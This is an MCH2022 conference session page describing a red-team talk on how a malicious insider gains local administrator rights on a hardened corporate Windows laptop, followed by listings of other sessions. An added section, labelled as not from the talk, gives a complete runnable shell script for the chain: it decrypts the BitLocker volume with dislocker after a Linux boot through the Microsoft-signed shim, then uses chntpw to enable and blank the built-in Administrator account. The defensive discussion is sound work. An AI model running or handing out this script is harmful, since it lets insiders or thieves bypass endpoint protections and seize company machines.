MCH2022 Curated content

Hacking Corporate Windows Laptops in 2022

Abacus 🧮
Wiebe Willems
It is interesting to see how recent technologies such as Microsoft Intune can be used to nullify endpoint security solutions such as Microsoft Defender for Endpoint, the big brother of Microsoft Defender. In this talk, we start from the perspective of a malicious insider in a company. He has low-privileged access to his own laptop/workstation, which has been carefully hardened with modern endpoint protections: Microsoft Defender for Endpoint, BitLocker and Secure Boot. Nowadays, central management of these tools is a must to ease the administration of all the company’s workstations, and that central management is the ideal target for a malicious insider who wants local administrative access over his laptop. We show a proof of concept in which a malicious insider gains administrative access within 10 minutes, needing nothing more than his own BitLocker recovery key, which is managed by Microsoft Intune and Azure Active Directory, and thereby defeats all the hardening measures on the workstation. We start from a real attack scenario that was part of one of our red team engagements and explain the steps we took to obtain local administrative privileges on the end user’s workstation. First we show how a malicious insider retrieves the BitLocker recovery key. Then we show that the default Secure Boot configuration still accepts the Microsoft-signed bootloader of an alternative operating system, which lets us boot into Linux, decrypt the BitLocker-encrypted hard drive with the recovery key and use tools to take control of the built-in local Administrator account. A thorough explanation, including defensive measures, is part of this talk as well.
This presentation is divided into three sections. First, we explain our attack scenario. As a malicious insider, we have access to our own user account and our own company-managed laptop. As a new employee, we receive the configuration that the company’s IT team deploys on every new laptop in its IT landscape. They know their business: they use an Endpoint Detection & Response (EDR) solution from Microsoft, Defender for Endpoint. Next to that, they configured BitLocker on their endpoints so that an attacker with physical access to the laptop’s hard drive cannot extract unencrypted data from it. To make sure that no malicious USB stick with Kali Linux can be used to bypass the security measures on the laptop, they enable Secure Boot in the UEFI settings. Of course, they also set an administrator password on the UEFI settings, so that nobody can alter them and simply disable Secure Boot.

Second, we talk about how centrally managed, cloud-native services such as Microsoft Azure Active Directory and Microsoft Intune work together to ease the management of endpoints in a company’s IT landscape. While a low-privileged user is blocked from most of the management portals for these services, he can still reach a platform where he can retrieve his own BitLocker recovery key: the BitLocker self-service portal. In the default configuration, a user can retrieve his recovery key through this portal without any approval from IT. We now have the BitLocker recovery key and a well-secured, company-managed endpoint. What could go wrong?

In the third section, we show how the default Secure Boot configuration still lets a malicious insider, or any attacker with physical access, boot an alternative Linux operating system: its bootloader (shim, on most distributions) is signed by the Microsoft third-party UEFI CA, which the firmware’s default Secure Boot signature database trusts. This lets the alternative operating system pass the Secure Boot check. We then install our tools on this Linux system to interact with the BitLocker-encrypted internal hard drive. Since we hold the recovery key, we can easily decrypt and mount the Windows partition on that drive. Since we have full control over the live operating system (remember, we’re root), we can use tools to modify the SAM database on the hard drive, the place where the local users of the Windows installation are stored. This way, we enable the built-in local Administrator account and set its password to an empty one. We write the change to the hard drive, reboot into Windows and, voilà, we have administrative access over the laptop. We could even go as far as adding exclusions to Microsoft Defender for Endpoint, essentially disabling it for that endpoint. During the talk, we give a live demo, cover defensive measures that hinder a malicious insider’s intent, and discuss the impact this attack can have in a corporate environment.
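The third section above, written down as a script for the Linux live system, is given here as an added example; it is not code from the talk, its demo or the red team engagement. It adds two checks a practitioner wants before touching the disk: that the recovery password read from the self-service portal is well-formed (eight groups of six digits, each group a 16-bit word times 11), and a record of the Secure Boot state the live system booted under. Everything environment-specific is an assumption: the Windows OS partition at /dev/sda3, the mount points under /mnt, dislocker and chntpw being installed on the live system, and Windows having been shut down fully rather than through Fast Startup (ntfs-3g refuses to mount a hibernated NTFS volume read-write).

```shell
#!/bin/sh
# Added example (not from the MCH2022 talk): recovery key -> Microsoft-signed
# Linux boot -> decrypt and mount the Windows volume -> edit the offline SAM.
# Hypothetical assumptions: Windows partition /dev/sda3, dislocker and chntpw
# installed, Windows fully shut down (no Fast Startup/hibernation).
set -eu

# A BitLocker recovery password is 48 digits in eight groups of six. Each group
# is a 16-bit word multiplied by 11, so every group must be divisible by 11 and
# be below 65536 * 11 = 720896. Checking this catches a mistyped key before
# dislocker fails on the volume.
valid_recovery_password() {
    rp=$1
    printf '%s\n' "$rp" | grep -Eq '^([0-9]{6}-){7}[0-9]{6}$' || return 1
    old_ifs=$IFS
    IFS='-'
    set -- $rp
    IFS=$old_ifs
    for group in "$@"; do
        # strip leading zeros so $(( )) does not read the group as octal
        n=$(printf '%s' "$group" | sed 's/^0*//')
        [ -n "$n" ] || n=0
        [ $((n % 11)) -eq 0 ] || return 1
        [ "$n" -lt 720896 ] || return 1
    done
    return 0
}

# Record that Secure Boot was enabled when this live system booted (so the
# engagement report shows the check was passed, not disabled) and, where
# efitools is installed, whether db trusts the third-party CA that signs shim.
# A fleet whose firmware no longer trusts that CA rejects the live USB outright.
secure_boot_preflight() {
    mokutil --sb-state 2>/dev/null || echo "mokutil not available"
    if command -v efi-readvar >/dev/null 2>&1; then
        if efi-readvar -v db 2>/dev/null | grep -q 'Microsoft Corporation UEFI CA 2011'; then
            echo "db trusts the Microsoft third-party UEFI CA: shim is accepted"
        else
            echo "db does not list the third-party UEFI CA: shim would be rejected"
        fi
    fi
}

# Unlock the BitLocker volume with the recovery password; dislocker exposes the
# decrypted volume as one file, which is then mounted as NTFS read-write.
decrypt_and_mount() {
    rp=$1
    dev=${2:-/dev/sda3}
    valid_recovery_password "$rp" || { echo "recovery password malformed" >&2; return 1; }
    mkdir -p /mnt/dislocker /mnt/windows
    dislocker -V "$dev" --recovery-password="$rp" -- /mnt/dislocker
    mount -o loop,rw /mnt/dislocker/dislocker-file /mnt/windows
}

# Enable the built-in Administrator and blank its password in the offline SAM.
# The account is addressed by RID 500 (0x1f4) so a renamed account is still
# found. chntpw's user menu: 1 = clear password, 2 = unlock/enable account,
# q = quit; the final "y" confirms writing the hive back to disk.
enable_builtin_admin() {
    sam=/mnt/windows/Windows/System32/config/SAM
    chntpw -l "$sam"
    printf '1\n2\nq\ny\n' | chntpw -u 0x1f4 "$sam"
}

main() {
    secure_boot_preflight
    decrypt_and_mount "$1" "${2:-/dev/sda3}"
    enable_builtin_admin
    umount /mnt/windows
    umount /mnt/dislocker   # flushes the SAM write back through dislocker
    echo "done: reboot into Windows and log on as the built-in Administrator"
}

# Only run the destructive part when a recovery password is given on the
# command line; without arguments the script just defines the functions.
if [ "$#" -ge 1 ]; then
    main "$@"
fi
```

Run it as root from the Microsoft-signed Linux live system as `sh chain.sh <48-digit-recovery-password> /dev/sda3`. The two guards are where the defence bites: a firmware whose db no longer trusts the Microsoft third-party UEFI CA never gets as far as the live system, and a self-service portal that does not hand out the recovery key leaves `decrypt_and_mount` with nothing to work with.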

Additional information

Type Talk
Language English

More sessions

7/22/22
MCH2022 Curated content
Elger "Stitch" Jonker
Abacus 🧮
⚠️ Warning! This talk may contain hackers. There may be hackers in the room. There may be hackers surrounding the room. There may be hackers recording this. There may be hackers listening in. There may be hackers that exfiltrate data. There may be hackers wearing shirts. There may be hackers carrying spying devices. OH NO! There are hackers EVERYWHERE! What can we do now, except having a party?
7/22/22
MCH2022 Curated content
Jelle vd ster
Abacus 🧮
What do big tech, synthesizers, the crucifixion and Matthäus Passion have in common? Find the answer in the tech performance The Silicon Passion. We’ve all embraced big tech, but is it a warm hug or a strangulation? Bear witness to a debate of biblical proportions between tech nerds, technology and its users. In The Silicon Passion SETUP, in collaboration with de Transmissie (David Schwarz and Derk Stenvers) and Rodrigo Ferreira, is looking for a way out of the pit that technology has ...
7/22/22
MCH2022 Curated content
Clairvoyance 🔮
Lightning talks are 5 to 10 minute quick talks on an interesting subject. They can be with or without slides, and with or without proper preparation. If you weren't accepted in the main CfP, this is also a great opportunity to give an abridged version of your talk. These sessions will be available to sign up to later on, with details on the wiki.
7/22/22
MCH2022 Curated content
Mikko Hypponen
Abacus 🧮
This is a submission for a keynote talk at MCH2022. The Internet is both a familiar, comfortable place as well as a bottomless rabbit hole you can lose yourself in. The Internet has always been like this from its inception, the difference now is the scale and consequences are almost immeasurable - and it tests the limits of human imagination. When you look into the mirror of the Internet what you see reflected back depends on what you are looking for. It has become largely a reflection of ...
7/22/22
MCH2022 Curated content
Battery 🔋
Thanks to DNSSEC and DANE, it is possible to automatically verify user@domain.name identities by checking with domain.name servers. The real problem however, is integration with existing protocols, instead of inventing something completely new and perhaps web-only. The purpose of our work on Realm Crossover mechanisms has been to design generic solutions that extend many different application protocols, without changing their protocol specs.
7/22/22
MCH2022 Curated content
Klaus Agnoletti
Clairvoyance 🔮
Utilizing collaborative security to collect data on attacks we were able to detect Log4J in a quite unusual but effective manner. We'll show you how CrowdSec enables the entire infosec community to stand together by detecting attempts to exploit a critical 0day, reporting them centrally thereby enabling anyone to protect themselves shortly after the vulnerability was made public. The unusual part is that this is done using FOSS software and by analyzing logs of real production systems but in a ...
7/22/22
MCH2022 Curated content
bert hubert
Abacus 🧮
Building on the very well attended DNA presentations ("DNA: The Code Of Life") at SHA2017, this talk will cover: * A brief recap what DNA is and how it works * It is surprisingly digital! * How reading DNA is within 'pro-sumer' reach now * (I might bring a live demo for after the talk) * An overview of DNA editing technologies (offline, and online: on living organisms) * Including the famous CRISPR-CAS, but also newer variants * How does such editing actually work in a lab? * The surprising lack ...